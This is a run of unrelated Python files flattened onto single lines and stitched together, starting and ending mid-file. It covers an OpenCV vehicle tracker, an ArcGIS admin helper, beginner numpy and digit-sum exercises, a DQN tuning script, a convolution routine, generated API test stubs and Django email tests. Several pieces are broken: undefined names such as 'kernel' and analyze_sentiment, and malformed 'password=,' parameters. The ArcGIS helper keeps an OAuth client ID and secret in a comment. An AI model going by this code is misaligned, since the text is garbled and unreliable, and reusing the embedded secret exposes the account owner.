ymin = self.history[-after_no_of_frames][1] xmax = self.history[-after_no_of_frames][2] ymax = self.history[-after_no_of_frames][3] num_of_frames = len(self.history) if last_no_of_frame != 0: num_of_frames = last_no_of_frame size = len(self.history) for i in range(size-2,size-num_of_frames-1,-1): position = self.history[i] if position[0] < xmin: xmin = position[0] if position[1] < ymin: ymin = position[1] if position[2] > xmax: xmax = position[2] if position[3] > ymax: ymax = position[3] xmin = int(max(xmin,0)) ymin = int(max(ymin,0)) xmax = int(min(xmax,self.frame_width)) ymax = int(min(ymax,self.frame_height)) return xmin,ymin,xmax,ymax def showFrame(self, frame): if self.tracker_type == TrackerType.MOSSE: (x, y) = self.tracker.getCenterOfTracker() xmin, ymin, xmax, ymax = self.tracker.getCutFramePosition() else: (x, y) = self.get_position() xmin, ymin, xmax, ymax = self.getCutFramePosition(self.get_position()) cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), (0, 0, 255)) if self.tracker_type == TrackerType.MOSSE: if self.tracker.isGood(): 
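                # MOSSE PSR quality check passed: mark the tracked centre with a dot;
                # the else-branch below draws a cross over the box to flag a lost/occluded target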
cv2.circle(frame, (int(x), int(y)), 2, (0, 0, 255), -1) else: cv2.line(frame, (xmin, ymin), (xmax, ymax), (0, 0, 255)) cv2.line(frame, (xmax, ymin), (xmin, ymax), (0, 0, 255)) #draw_str(frame, (xmin, ymax + 16), 'Id: %i' % self.tracker_id) #draw_str(frame, (xmin, ymax + 32), 'PSR: %.2f' % self.tracker.getPsr()) # draw_str(frame, (xmin, ymax + 64), 'Max Speed: %.2f' % self.getMaxSpeed()) # draw_str(frame, (xmin, ymax + 80), 'Avg Speed: %.2f' % self.getAvgSpeed()) # draw_str(frame, (xmin, ymax + 96), 'Cur Speed: %.2f' % self.getCurrentSpeed()) # draw_str(frame, (xmin, ymax + 112), 'Area Size: %.2f' % self.getCarSizeCoefficient()) # draw_str(frame, (xmin, ymax + 128), 'Moving Angle: %.2f' % self.getCarAngle()) def clearHistory(self): self.history = [] def saveTracking(self,frames): new_frames,width,height,_,_,_,_ = self.getFramesOfTracking(frames) if new_frames == None: return out = cv2.VideoWriter('./track_videos/' + str(self.tracker_id) + ") " + str(self.index) + '.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30, (width, height)) size = len(new_frames) for i in range(size): out.write(new_frames[i]) print("tracker_id " + str(self.tracker_id) + " saved!") self.index+=1 out.release() def getMaxSpeed(self): if self.tracker_type == MOSSE: x = max(self.tracker.dx) y = max(self.tracker.dy) else: x = max(self.dx) y = max(self.dy) r = pow(pow(x,2)+pow(y,2),0.5) r_coefficient = r * self.getCarSizeCoefficient() return r_coefficient def getAvgSpeed(self,from_frame_no = -1,to_frame_no = -1): if self.tracker_type == TrackerType.MOSSE: if from_frame_no == -1 or to_frame_no == -1: dx_change = self.tracker.dx dy_change = self.tracker.dy else: dx_change = self.tracker.dx[from_frame_no:to_frame_no] dy_change = self.tracker.dy[from_frame_no:to_frame_no] else: if from_frame_no == -1 or to_frame_no == -1: dx_change = self.dx dy_change = self.dy else: dx_change = self.dx[from_frame_no:to_frame_no] dy_change = self.dy[from_frame_no:to_frame_no] x = sum(dx_change)/len(dx_change) y = sum(dy_change)/len(dy_change) r = pow(pow(x, 2) + pow(y, 2), 0.5) r_coefficient = r * self.getCarSizeCoefficient() return r_coefficient def getCurrentSpeed(self): if self.tracker_type == MOSSE: no_of_last_frames = min(len(self.tracker.dx),3) x = sum(self.tracker.dx[-no_of_last_frames:]) / no_of_last_frames y = sum(self.tracker.dy[-no_of_last_frames:]) / no_of_last_frames else: no_of_last_frames = min(len(self.dx),3) x = sum(self.dx[-no_of_last_frames:]) / no_of_last_frames y = sum(self.dy[-no_of_last_frames:]) / no_of_last_frames r = pow(pow(x, 2) + pow(y, 2), 0.5) r_coefficient = r * self.getCarSizeCoefficient() return r_coefficient def getCarSizeCoefficient(self): # area = 0.5 * self.tracker.width * self.tracker.height if self.tracker_type == MOSSE: area = self.tracker.area else: area = self.width * self.height coefficient = 43200/area return coefficient def getCarAngle(self): if self.tracker_type == TrackerType.MOSSE: max_index_to_measure = min(1000,len(self.tracker.dx)) dx = sum(self.tracker.dx[:max_index_to_measure]) dy = sum(self.tracker.dy[:max_index_to_measure]) else: max_index_to_measure = min(1000, len(self.dx)) dx = sum(self.dx[:max_index_to_measure]) dy = sum(self.dy[:max_index_to_measure]) is_dx_sign_pos = True if dx < 0: is_dx_sign_pos = False is_dy_sign_pos = True if dy < 0: is_dy_sign_pos = False if dx == 0: if dy > 0: return 270 elif dy < 0: return 90 else: return -1 degree = math.degrees(math.atan(abs(dy/dx))) #remember the y coordinate min at the left up corner so flip the graph if dx < 0 and dy >=0: return 180 + 
degree elif dx <0 and dy <= 0: return 180 - degree elif dx > 0 and dy <= 0: return degree else: return 360 - degree def futureFramePosition(self, ): if self.tracker_type == TrackerType.MOSSE: if len(self.tracker.dx) <5 or len(self.tracker.dx) > 20 : self.estimationFutureCenter.append(self.tracker.center) return -1,-1,-1,-1 measure = min(len(self.tracker.dx),10) expectedPositionNo = len(self.tracker.dx)+10 x,y = self.tracker.center dx = sum(self.tracker.dx[-measure:]) / len(self.tracker.dx[-measure:]) dy = sum(self.tracker.dy[-measure:]) / len(self.tracker.dy[-measure:]) x_new = x + dx*measure y_new = y + dy*measure self.estimationFutureCenter[expectedPositionNo] = (x_new,y_new) return self.tracker.getCutFramePosition((x_new,y_new)) else: if len(self.dx) <5 or len(self.dx) > 20 : self.estimationFutureCenter.append(self.get_position(self.history[-1])) return -1,-1,-1,-1 measure = min(len(self.dx),10) expectedPositionNo = len(self.dx)+10 x,y = self.get_position(self.history[-1]) dx = sum(self.dx[-measure:]) / len(self.dx[-measure:]) dy = sum(self.dy[-measure:]) / len(self.dy[-measure:]) x_new = x + dx*measure y_new = y + dy*measure self.estimationFutureCenter[expectedPositionNo] = (x_new,y_new) return self.getCutFramePosition((x_new,y_new)) #get frames of box to enter it to vif descriptor or save it def getFramesOfTracking(self,frames,last_no_of_frames = 30): if len(self.history) < last_no_of_frames: return None,-1,-1,-1,-1,-1,-1 xmin, ymin, xmax, ymax = self.getTrackedFramesBoxed(last_no_of_frames) width, height = xmax - xmin, ymax - ymin new_frames = [] size = len(frames) for i in range(size - last_no_of_frames, size, 1): new_frames.append(frames[i][ymin:ymax, xmin:xmax]) return new_frames,width,height,xmin,xmax,ymin,ymax def isAboveSpeedLimit(self,from_frame_no = -1,to_frame_no = -1): if self.avg_speed[to_frame_no] == None: self.avg_speed[to_frame_no] = self.getAvgSpeed(from_frame_no,to_frame_no) if self.avg_speed[to_frame_no] > 50: return True return False class TrackerManager: def __init__(self, srcVid, paused = False , test = True): self.cap = cv2.VideoCapture(srcVid) self.frame_width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)) self.frame_height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) ret, self.frame = self.cap.read() if not ret: print("ERROR: not return any feed from this src vid"+srcVid) return cv2.imshow('frame', self.frame) self.rect_sel = RectSelector('frame', self.select) self.trackers = [] self.paused = paused self.frames=[] def select(self, rect): global id frame_gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) tracker = Tracker(frame_gray,rect,self.frame_width,self.frame_height,id,TrackerType.DLIB) id+=1 # tracker = MOSSE(frame_gray, rect) self.trackers.append(tracker) def saveTrackers(self,trackers): for tracker in self.trackers: tracker.saveTracking(frames) def run(self): f = 1 cum = 0 global frames while True: if not self.paused: ret, self.frame = self.cap.read() if not ret: break dim = (480, 360) self.frame = cv2.resize(self.frame, dim, interpolation=cv2.INTER_AREA) frames.append(self.frame.copy()) frame_gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY) t = time() for tracker in self.trackers: f+=1 tracker.update(frame_gray) # tracker.updateTracking(frame_gray) cum += time() -t # print(time() - t ) vis = self.frame.copy() for tracker in self.trackers: tracker.showFrame(vis) self.rect_sel.draw(vis) cv2.imshow('frame', vis) ch = cv2.waitKey(10) if ch == 27: break if ch == ord(' '): self.paused = not self.paused if ch == ord('c'): self.trackers = [] if f%30 == 0: 
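# Note on the line that follows: Thread(target=self.saveTrackers(self.trackers))
# calls saveTrackers immediately on the main thread and hands its return value
# (None) to Thread, so the save is not actually run in the background. A hedged
# sketch of the intended pattern (assuming the save really is meant to run
# asynchronously) would be:
#
#     thread = Thread(target=self.saveTrackers, args=(self.trackers,))
#     thread.start()
#
# i.e. pass the callable and its arguments separately so Thread invokes it on the
# new thread. (saveTrackers above also ignores its `trackers` argument and walks
# self.trackers over the global `frames` list, which may or may not be intentional.)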
thread = Thread(target=self.saveTrackers(self.trackers)) thread.start() print(f/cum) if __name__ == '__main__': # opts, args = getopt.getopt(sys.argv[1:], '', ['pause']) # opts = dict(opts) # src = args[0] tracker_manager =TrackerManager(str(Path(__file__).parent.parent)+"\\videos\\1528.mp4", paused =True) tracker_manager.run() dateTimeFormat = '%Y-%m-%d %H:%M' import arcrest from arcrest.agol import FeatureLayer from arcrest.agol import FeatureService from arcrest.hostedservice import AdminFeatureService import datetime, time import json import os from .. import common import gc ######################################################################## class baseToolsClass(object): _org_url = None _username = None _password = None _proxy_url = None _proxy_port = None _token_url = None _securityHandler = None _featureServiceFieldCase = None #---------------------------------------------------------------------- def __init__(self, username=None, password=, org_url=None, token_url = None, proxy_url=None, proxy_port=None, use_arcgis_creds=None): """Constructor""" self._proxy_url = proxy_url self._proxy_port = proxy_port if use_arcgis_creds == True: self._securityHandler = arcrest.ArcGISTokenSecurityHandler(proxy_url=self._proxy_url, proxy_port=self._proxy_port) token = self._securityHandler.token self._org_url = self._securityHandler.org_url self._username = self._securityHandler.username self._valid = True else: self._token_url = token_url self._org_url = org_url self._username = username self._password = password if self._org_url is None or self._org_url =='': self._org_url = 'http://www.arcgis.com' if self._username == "" or self._password == "": self._message = "No username or password, no security handler generated" self._valid = True else: if self._org_url is None or '.arcgis.com' in self._org_url: self._securityHandler = arcrest.AGOLTokenSecurityHandler(username=self._username, password=, org_url=self._org_url, token_url=self._token_url, proxy_url=self._proxy_url, proxy_port=self._proxy_port) token = self._securityHandler.token #if self._securityHandler.message['error']['code'] == 400: #self._securityHandler = arcrest.OAuthSecurityHandler(client_id='', #secret_id='', #org_url=self._org_url, #proxy_url=self._proxy_url, #proxy_port=self._proxy_port) #token = self._securityHandler.token else: self._securityHandler = arcrest.PortalTokenSecurityHandler(username=self._username, password=self._password, org_url=self._org_url, proxy_url=self._proxy_url, proxy_port=self._proxy_port) token = self._securityHandler.token admin = arcrest.manageorg.Administration(url=self._org_url, securityHandler=self._securityHandler) hostingServers = admin.hostingServers() for hostingServer in hostingServers: serData = hostingServer.data serData dataItems = serData.rootDataItems if 'rootItems' in dataItems: for rootItem in dataItems['rootItems']: if rootItem == '/enterpriseDatabases': rootItems = serData.findDataItems(ancestorPath=rootItem,type='fgdb,egdb') if not rootItems is None and 'items' in rootItems: for item in rootItems['items']: if 'info' in item: if 'isManaged' in item['info'] and item['info']['isManaged'] == True: conStrDic = {} conStr = item['info']['connectionString'].split(";") for conStrValue in conStr: spltval = conStrValue.split("=") conStrDic[spltval[0]] = spltval[1] if 'DBCLIENT' in conStrDic: if str(conStrDic['DBCLIENT']).upper() == 'postgresql'.upper(): self._featureServiceFieldCase = 'lower' #if 'error' in self._securityHandler.message and token is None: #if 
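# Aside on the connection-string parsing a few lines up: splitting each pair on "="
# with plain indexing breaks if a value itself contains "=" (common in encrypted
# PASSWORD tokens). A slightly more defensive sketch of the same idea, with the
# variable names assumed from the surrounding code:
#
#     con_str = item['info']['connectionString']
#     con_str_dic = dict(
#         part.split("=", 1)          # split only on the first "=" of each pair
#         for part in con_str.split(";")
#         if "=" in part              # skip empty or malformed fragments
#     )
#     if con_str_dic.get('DBCLIENT', '').upper() == 'POSTGRESQL':
#         self._featureServiceFieldCase = 'lower'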
self._securityHandler.message['error']== 401: #self._securityHandler = arcrest.OAuthSecurityHandler(client_id='s5CKlHcJoNSm07TP', #secret_id='6015feb0f44c4a5fa00e1e9486de8c48', #org_url=self._org_url, #proxy_url=self._proxy_url, #proxy_port=self._proxy_port) #token = self._securityHandler.token if 'error' in self._securityHandler.message and token is None: self._message = self._securityHandler.message self._valid = False else: self._message = self._securityHandler.message self._valid = True #---------------------------------------------------------------------- def dispose(self): self._username = None self._password = None self._org_url = None self._proxy_url = None self._proxy_port = None self._token_url = None self._securityHandler = None self._valid = None self._message = None del self._username del self._password del self._org_url del self._proxy_url del self._proxy_port del self._token_url del self._securityHandler del self._valid del self._message #---------------------------------------------------------------------- @property def message(self): """ returns any messages """ return self._message #---------------------------------------------------------------------- @message.setter def message(self,message): """ returns any messages """ self._message = message #---------------------------------------------------------------------- @property def valid(self): """ returns boolean wether handler is valid """ return self._valid #---------------------------------------------------------------------- @valid.setter def valid(self,valid): """ returns boolean wether handler is valid """ self._valid = valid # __author__ = chnegpeng # __email__ = # __date__ = 2020.11.10 # __desc__ = calculate the sum of each figure of a number a=0 """ 1.题目:给定一个三位数,求每位上的数字之和 2.思考需要哪些变量,先定义变量 """ sum = 0 number = 123 weight = 100 figure = 0 """ 1.因为不需要遍历一个区间的所有数,所以不用for循环 2.选择 while 循环 3.继续思考谁在while循环中充当变量? 4.陈导给的选择是 weight """ while weight >= 1: """ 1.因为是各位数上的数字求和,所以要找出对应的数字 2.利用整除法 可以得到百位,十位,个位数字 3.利用取余法可以得到剩下的两位数 """ figure = number // weight number = number % weight """ 1。到达上面一步后,思维就卡壳了,我还在想改如何对十位上的数字取整 2.按照思维惯性,还会继续写 figure = number // weight来求十位,可能会再定义weight等 3.上面的思路其实忘掉了while作为循环语句的本质了,因为下面的代码只要符合条件就会一直循环执行 4.再看一下循环条件 weight >= 1.开头已经定义了weight= 100.现在需要重新定义或重新赋值 """ weight = weight // 10 """ 1.一定要熟悉 sum = sum + a 的结构,相当于重新赋值、定义 2.也就是陈导强调的:在需要的时候就去定义变量 3.最后一行代码 和 while 形成一个闭环,首尾呼应了 """ sum = sum + figure print("figure",figure) """ 1.还要注意代码缩进,sum写在不同的位置结果就不同,刚刚又弄错了 """ print("sum",sum) gustavopmachado/MITx6.86x import numpy as np def randomization(n): """ Arg: n - an integer Returns: A - a randomly-generated nx1 Numpy array. """ A = np.random.random_sample([n, 1]) return A def operations(h, w): """ Takes two inputs, h and w, and makes two Numpy arrays A and B of size h x w, and returns A, B, and s, the sum of A and B. Arg: h - an integer describing the height of A and B w - an integer describing the width of A and B Returns (in this order): A - a randomly-generated h x w Numpy array. B - a randomly-generated h x w Numpy array. s - the sum of A and B. """ A = np.random.random_sample([h, w]) B = np.random.random_sample([h, w]) s = A + B return A, B, s def norm(A, B): """ Takes two Numpy column arrays, A and B, and returns the L2 norm of their sum. Arg: A - a Numpy array B - a Numpy array Returns: s - the L2 norm of A+B. 
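# (Referring back to the digit-sum exercise earlier in this row, whose comments are
# in Chinese: it walks `weight` through 100 -> 10 -> 1, peeling one decimal digit off
# `number` per iteration and accumulating it into `sum`.) A compact sketch of the same
# idea that works for any non-negative integer, not just a three-digit one -- the
# function name is mine:

def digit_sum(number):
    total = 0
    while number > 0:
        total += number % 10   # take the lowest digit
        number //= 10          # drop it
    return total

# digit_sum(123) == 1 + 2 + 3 == 6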
""" s = np.linalg.norm(A+B) return s def neural_network(inputs, weights): """ Takes an input vector and runs it through a 1-layer neural network with a given weight matrix and returns the output. Arg: inputs - 2 x 1 NumPy array weights - 2 x 1 NumPy array Returns (in this order): out - a 1 x 1 NumPy array, representing the output of the neural network """ # Dot product between the inputs and weights vectors r = np.sum(np.dot(np.transpose(weights), inputs)) # Apply a non-linear function to the result z = np.array([np.tanh(np.array([r]))]) return z def scalar_function(x, y): """ Returns the f(x,y) defined in the problem statement. """ if x <= y: return x * y return x / y def vector_function(x, y): """ Make sure vector_function can deal with vector input x,y. """ # Vectorize the scalar function f = np.vectorize(scalar_function) return f(x, y) def main(): x = np.random.random_sample([2, 1]) y = np.random.random_sample([2, 1]) z = vector_function(x, y) print(z) if __name__ == "__main__": main() 0 #!/usr/bin/env python # Copyright 2019 Google, LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # To install the latest published package dependency, execute the following: # pip install google-cloud-language # [START language_sentiment_text] from google.cloud import language from google.cloud.language import enums from google.cloud.language import types def analyze_sentiment_text(text_content='I am so happy and joyful'): """Analyze sentiment of text Args: text: Text to analyze, e.g. 'Hello, world!' 
""" client = language.LanguageServiceClient() document = types.Document( content=text_content, type=enums.Document.Type.PLAIN_TEXT) response = client.analyze_sentiment(document) sentiment = response.document_sentiment print('Score: {}'.format(sentiment.score)) print('Magnitude: {}'.format(sentiment.magnitude)) # [END language_sentiment_text] def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument( '--text_content', type=str, default='Hello, world!') args = parser.parse_args() analyze_sentiment(args.text_content) if __name__ == '__main__': main() from fontParts.base.anchor import BaseAnchor from babelfont import addUnderscoreProperty @addUnderscoreProperty("name") @addUnderscoreProperty("glyph") @addUnderscoreProperty("color") @addUnderscoreProperty("x") @addUnderscoreProperty("y") class Anchor(BaseAnchor): pass import json import time import numpy as np import argparse from pathlib import Path from itertools import product from pprint import PrettyPrinter from grl.generalized_experiment import GeneralizedExperiment from grl.agents import DQNAgent # from grl.agents import SarsaTCAgent from grl.envs.mountaincar import MountainCarEnv from definitions import ROOT_DIR def get_lr(b=1e-2, a=2, n=5): return list(b/a**np.array(list(range(0, n)))) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--no-target", help="Don't use target networks", action="store_true") parser.add_argument("--no-replay", help="Don't use experience replay", action="store_true") args = parser.parse_args() pp = PrettyPrinter(indent=4) # So here we need to run multiple runs over multiple hyperparams. # step_sizes = [1.0, 0.75, 0.5, 0.25, 0.125, 0.06125] # # tilings = [8, 16, 32] # # tiles = [8, 16, 32] max_replay_sizes = [10000] update_target_intervals = [10000] step_sizes = get_lr()[-3:-2] # THIS IS JUST A TEST # We set num_actions in experiment.py run_hps = { 'log_every': 1000, 'max_eps_steps': float('inf'), 'max_total_steps': 150000 } all_avg_results = [] exp_dir = Path(ROOT_DIR, 'experiments') timestr = time.strftime("%Y%m%d-%H%M%S") print(f"Start experiment for DQN at {timestr}") env_hps_fname = exp_dir / 'tuning_params.json' with open(env_hps_fname, 'r') as f: env_hpses = json.load(f) # run across all hyperparams current_max = None current_max_rew = -float('inf') for step_size, replay_size, update_target in product(step_sizes, max_replay_sizes, update_target_intervals): agent_hps = { 'batch_size': 32, 'epsilon': 0.01, 'step_size': step_size, 'discount': 0.99, 'max_replay_size': replay_size, 'update_target_interval': update_target, 'use_replay': not args.no_replay, 'use_target': not args.no_target } print("Experiment on DQN on hyperparams") pp.pprint(agent_hps) exp = GeneralizedExperiment(DQNAgent, MountainCarEnv, agent_hps=agent_hps, env_hpses=env_hpses, run_hps=run_hps, seeds=[2020]) exp.run() # here we append the average per-episode reward across all 25 tuning # environments. 
avg_rew = np.average(exp.all_avg_ep_rews) all_avg_results.append((agent_hps, avg_rew)) if avg_rew > current_max_rew: current_max = agent_hps current_max_rew = avg_rew print(f"Done tuning, best performant agent for DQN is") pp.pprint(current_max) # Here we need to pick which ones are best print("Begin testing") # Test here test_env_hps_fname = Path(ROOT_DIR, 'experiments', 'testing_params.json') with open(test_env_hps_fname, 'r') as f: test_env_hpses = json.load(f) test_exp = GeneralizedExperiment(DQNAgent, MountainCarEnv, agent_hps=current_max, env_hpses=test_env_hpses, run_hps=run_hps, seeds=[2020]) test_exp.run() results = { 'best_hparams': current_max, 'avg_ep_rewards': test_exp.all_avg_ep_rews, 'all_tune_results': all_avg_results } fname = "dqn" if args.no_target: fname += "_no_target" if args.no_replay: fname += "_no_replay" res_fname = exp_dir / 'dqn' / f'{fname}_results_{timestr}.json' print(f"Testing finished. Saving results to {res_fname}") with open(res_fname, 'w') as f: json.dump(results, f) 0 import numpy as np def convolucion(Ioriginal,Kernel): fr = len(Ioriginal) - (len(Kernel) - 1) cr = len(Ioriginal[0]) - (len(kernel[0])- 1) Resultado = np.zeros((fr,cr)) #for para recorrer filas for i in range(len(Resultado)): #for para recorrer columnas for j in range(len(Resultado[0])): #Hace las multiplicaciones y la suma suma = 0 #for para cada elemento del kernel de las filas del kernel for m in range(len(Kernel)): #for para cada elemento del kernel de las columnas for n in range(len(kernel[0])): suma += Kernel[m][n] * Ioriginal[m+i][n+j] Resultado[i][j] = suma return Resultado #imagenes K=[[-1,0,1],[-1,0,1],[-1,0,1]] I=[[2,0,1,1,1],[3,0,0,0,2],[1,1,1,1,1],[3,1,1,1,2],[1,1,1,1,1]] #imagenes a numpy arrays In = np.array(I) Kn = np.array(K) #Funcion de convolucion R = convolucion(In,Kn) print(R) """ eZmax API Definition (Full) This API expose all the functionnalities for the eZmax and eZsign applications. 
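# (The convolucion() function earlier in this row has a case bug: the parameter is
# named Kernel but the body also refers to kernel in lowercase, which raises a
# NameError. A self-contained sketch of the same "valid" sliding-window correlation,
# with the case fixed and NumPy used for the inner sum -- the function name is mine:)
import numpy as np

def convolve2d_valid(image, kernel):
    """'Valid' 2-D sliding-window correlation, matching the loop version above."""
    image = np.asarray(image, dtype=float)
    kernel = np.asarray(kernel, dtype=float)
    out_rows = image.shape[0] - kernel.shape[0] + 1
    out_cols = image.shape[1] - kernel.shape[1] + 1
    result = np.zeros((out_rows, out_cols))
    for i in range(out_rows):
        for j in range(out_cols):
            # element-wise product of the kernel with the window under it
            result[i, j] = np.sum(kernel * image[i:i + kernel.shape[0],
                                                 j:j + kernel.shape[1]])
    return result

# Same test data as above:
# K = [[-1, 0, 1], [-1, 0, 1], [-1, 0, 1]]
# I = [[2, 0, 1, 1, 1], [3, 0, 0, 0, 2], [1, 1, 1, 1, 1], [3, 1, 1, 1, 2], [1, 1, 1, 1, 1]]
# print(convolve2d_valid(I, K))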
# noqa: E501 The version of the OpenAPI document: 1.1.7 Contact: Generated by: https://openapi-generator.tech """ import sys import unittest import eZmaxApi from eZmaxApi.model.common_response import CommonResponse from eZmaxApi.model.common_response_obj_debug import CommonResponseObjDebug from eZmaxApi.model.common_response_obj_debug_payload import CommonResponseObjDebugPayload from eZmaxApi.model.ezsigndocument_edit_ezsignsignatures_v1_response_all_of import EzsigndocumentEditEzsignsignaturesV1ResponseAllOf from eZmaxApi.model.ezsigndocument_edit_ezsignsignatures_v1_response_m_payload import EzsigndocumentEditEzsignsignaturesV1ResponseMPayload globals()['CommonResponse'] = CommonResponse globals()['CommonResponseObjDebug'] = CommonResponseObjDebug globals()['CommonResponseObjDebugPayload'] = CommonResponseObjDebugPayload globals()['EzsigndocumentEditEzsignsignaturesV1ResponseAllOf'] = EzsigndocumentEditEzsignsignaturesV1ResponseAllOf globals()['EzsigndocumentEditEzsignsignaturesV1ResponseMPayload'] = EzsigndocumentEditEzsignsignaturesV1ResponseMPayload from eZmaxApi.model.ezsigndocument_edit_ezsignsignatures_v1_response import EzsigndocumentEditEzsignsignaturesV1Response class TestEzsigndocumentEditEzsignsignaturesV1Response(unittest.TestCase): """EzsigndocumentEditEzsignsignaturesV1Response unit test stubs""" def setUp(self): pass def tearDown(self): pass def testEzsigndocumentEditEzsignsignaturesV1Response(self): """Test EzsigndocumentEditEzsignsignaturesV1Response""" # FIXME: construct object with mandatory attributes with example values # model = EzsigndocumentEditEzsignsignaturesV1Response() # noqa: E501 pass if __name__ == '__main__': unittest.main() 0 import dash import dash_html_components as html from app_template import GenerateApp app = dash.Dash(__name__) app.layout = html.Div(children=GenerateApp(app=app).html) if __name__ == '__main__': app.run_server(host='0.0.0.0', port=8000, debug=True)from math import pi from physical_constants import * n = 3.62 me = 0.067 * m0 mh = 0.47 * m0 Ep = 25.7 * q M = (m0 / 6) * Ep Eg = 1.424 * q #Na = 2.0e18 * 1e6 Nd = 0.0 Na = 0.0 #Na = 0.0 #Nd = 2.0e17 *1e6 ni = 2.1e6 * 1e6 Nc = 4.37e17 * 1e6 Nv = 8.68e18 * 1e6 from docx import Document import re doc = Document(r"D:/PTU/Gardenia/2022/SplitandMerge/tools/sea/democ.docx") pp = '父亲' for p in doc.paragraphs: matchRet = re.findall(pp,p.text) for r in matchRet: p.text = p.text.replace(r,'MOMO') doc.add_heading('一级标题') doc.save(r'D:/PTU/Gardenia/2022/SplitandMerge/tools/sea/democc.docx') datawinners/entity/tests/test_views_unit_test.py from collections import OrderedDict from unittest.case import TestCase from django.conf import settings from django.contrib.auth.models import User from django.contrib.sites.models import get_current_site from django.http import HttpRequest from django.template.loader import render_to_string from django.utils.http import int_to_base36 from mock import Mock, patch, PropertyMock from django.core import mail from datawinners.entity.view.unique_id import _subject_short_codes_to_delete from datawinners.entity.views import initialize_values from datawinners.entity.views import _format_imported_subjects_datetime_field_to_str from mangrove.datastore.database import DatabaseManager from mangrove.datastore.entity import Entity from datawinners.accountmanagement.models import Organization, NGOUserProfile from datawinners.entity.views import create_single_web_user from datawinners.entity.import_data import send_email_to_data_sender from datawinners.search.entity_search import 
SubjectQuery from datawinners.tests.email_utils import set_email_settings from mangrove.form_model.field import TextField, DateField from mangrove.form_model.form_model import FormModel import datetime WEB_USER_TEST_EMAIL = "create_" class TestView(TestCase): def setUp(self): set_email_settings() def test_create_single_web_user(self): org = Mock(spec=Organization) org.org_id = "org_id" org.account_type = "Basic" site = get_current_site(None) mock_entity = Mock(spec=Entity) mock_entity.value.return_value = 'test' users = User.objects.filter(email=WEB_USER_TEST_EMAIL) NGOUserProfile.objects.filter(org_id=org.org_id).delete() users.delete() with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" with patch("datawinners.entity.views.get_database_manager_for_org") as get_dbm: get_dbm.return_value = Mock(spec=DatabaseManager) with patch("datawinners.accountmanagement.models.Organization.objects.get") as get_organization_mock: get_organization_mock.return_value = org with patch("datawinners.entity.views.get_by_short_code") as reporter_entity: with patch("datawinners.entity.views.put_email_information_to_entity") as put_email_information_to_entity: put_email_information_to_entity.return_value = None reporter_entity.return_value = mock_entity create_single_web_user(org.org_id, WEB_USER_TEST_EMAIL, "test", "en") user = User.objects.filter(email=WEB_USER_TEST_EMAIL)[0] emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([WEB_USER_TEST_EMAIL], sent_email.to) ctx_dict = { 'domain': "localhost:8000", 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'account_type': org.account_type, 'site': site, } self.assertEqual(render_to_string( 'activatedatasenderemail/activation_email_subject_for_data_sender_account_en.txt'), sent_email.subject) self.assertEqual( render_to_string('activatedatasenderemail/activation_email_for_data_sender_account_en.html', ctx_dict), sent_email.body) def test_should_send_correct_activation_email_in_html_format_in_english(self): site = get_current_site(None) user = Mock(spec=User) user.email = '' user.id = 1 user.first_name = "test" language_code = "en" with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" send_email_to_data_sender(user, language_code) emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual("html", sent_email.content_subtype) self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([''], sent_email.to) self.assertEqual([settings.HNI_SUPPORT_EMAIL_ID], sent_email.bcc) ctx_dict = { 'domain': site.domain, 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'site': site, } self.assertEqual( render_to_string('activatedatasenderemail/activation_email_subject_for_data_sender_account_en.txt'), sent_email.subject) self.assertEqual( render_to_string('activatedatasenderemail/activation_email_for_data_sender_account_en.html', ctx_dict), sent_email.body) def test_should_send_correct_activaton_email_in_html_format_in_french(self): site = get_current_site(None) user = Mock(spec=User) user.email = '' user.id = 1 user.first_name = "test" language_code = "fr" with patch("django.contrib.auth.tokens.default_token_generator.make_token") 
as make_token: make_token.return_value = "token" send_email_to_data_sender(user, language_code) emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual("html", sent_email.content_subtype) self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([''], sent_email.to) self.assertEqual([settings.HNI_SUPPORT_EMAIL_ID], sent_email.bcc) ctx_dict = { 'domain': site.domain, 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'site':site, } self.assertEqual( render_to_string('activatedatasenderemail/activation_email_subject_for_data_sender_account_fr.txt'), sent_email.subject) self.assertEqual( render_to_string('activatedatasenderemail/activation_email_for_data_sender_account_fr.html', ctx_dict), sent_email.body) def test_should_send_correct_email_in_html_format_in_french_to_a_newly_created_user(self): site = get_current_site(None) user = Mock(spec=User) user.email = '' user.id = 1 user.first_name = "test" language_code = "fr" request = Mock() request.user.first_name = "rakoto" with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" send_email_to_data_sender(user, language_code, type="created_user", request=request) emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual("html", sent_email.content_subtype) self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([''], sent_email.to) self.assertEqual([settings.HNI_SUPPORT_EMAIL_ID], sent_email.bcc) ctx_dict = { 'domain': site.domain, 'uid': 